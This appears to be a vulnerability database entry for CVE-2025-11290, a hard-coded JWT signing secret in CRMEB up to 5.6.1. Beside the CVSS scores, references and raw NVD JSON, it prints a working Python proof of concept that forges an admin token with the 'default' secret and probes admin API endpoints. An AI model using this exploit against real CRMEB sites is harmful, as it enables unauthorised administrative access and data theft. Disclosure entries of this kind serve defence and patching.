CVE-2025-11290

Description

A vulnerability was identified in CRMEB up to 5.6.1. This affects an unknown function of the component JWT HMAC Secret Handler. Such manipulation of the argument secret with the input default leads to use of hard-coded cryptographic key . It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is reported as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:* - VULNERABLE

CRMEB <= 5.6.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11290 - CRMEB JWT Hard-coded Secret PoC
# Exploit for hard-coded JWT HMAC secret in CRMEB <= 5.6.1

import jwt
import requests
import json
import time

TARGET_URL = "http://target-crmeb-site.com"
# Hard-coded default JWT HMAC secret used by vulnerable CRMEB versions
DEFAULT_SECRET = "default"

def forge_jwt_token(user_id=1, username="admin"):
    """
    Forge a JWT token using the hard-coded default secret
    """
    payload = {
        "id": user_id,
        "username": username,
        "iat": int(time.time()),
        "exp": int(time.time()) + 3600,
        "role": "admin"
    }
    # Sign JWT with the known hard-coded default secret
    token = jwt.encode(payload, DEFAULT_SECRET, algorithm="HS256")
    return token

def exploit(target_url):
    """
    Exploit the hard-coded JWT secret vulnerability
    """
    # Step 1: Forge admin JWT token
    forged_token = forge_jwt_token(user_id=1, username="admin")
    print(f"[+] Forged JWT Token: {forged_token}")

    # Step 2: Attempt to access protected admin endpoint
    headers = {
        "Authorization": f"Bearer {forged_token}",
        "Content-Type": "application/json"
    }

    # Step 3: Try common admin endpoints
    admin_endpoints = [
        "/api/admin/userinfo",
        "/api/admin/index",
        "/adminapi/system/config",
        "/api/user/info"
    ]

    for endpoint in admin_endpoints:
        url = target_url + endpoint
        try:
            response = requests.get(url, headers=headers, timeout=10)
            if response.status_code == 200:
                print(f"[+] SUCCESS - Access granted at {endpoint}")
                print(f"[+] Response: {response.text[:500]}")
                return True
        except Exception as e:
            print(f"[-] Error at {endpoint}: {e}")

    return False

if __name__ == "__main__":
    print("[*] CVE-2025-11290 - CRMEB JWT Hard-coded Secret Exploit")
    print(f"[*] Target: {TARGET_URL}")
    exploit(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11290
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11290
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11290/
[4] VulDB https://vuldb.com/cve/CVE-2025-11290
[5] https://vuldb.com/?ctiid.327171
[6] https://vuldb.com/?id.327171
[7] https://vuldb.com/?submit.659843
[8] https://vuldb.com/?submit.659843

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11290", "sourceIdentifier": "[email protected]", "published": "2025-10-05T12:15:31.063", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in CRMEB up to 5.6.1. This affects an unknown function of the component JWT HMAC Secret Handler. Such manipulation of the argument secret with the input default leads to use of hard-coded cryptographic key\r . It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is reported as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6.1", "matchCriteriaId": "B414DC17-48B1-4FEC-A697-39E37C55439A"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327171", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327171", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659843", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659843", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "VDB Entry"]}]}}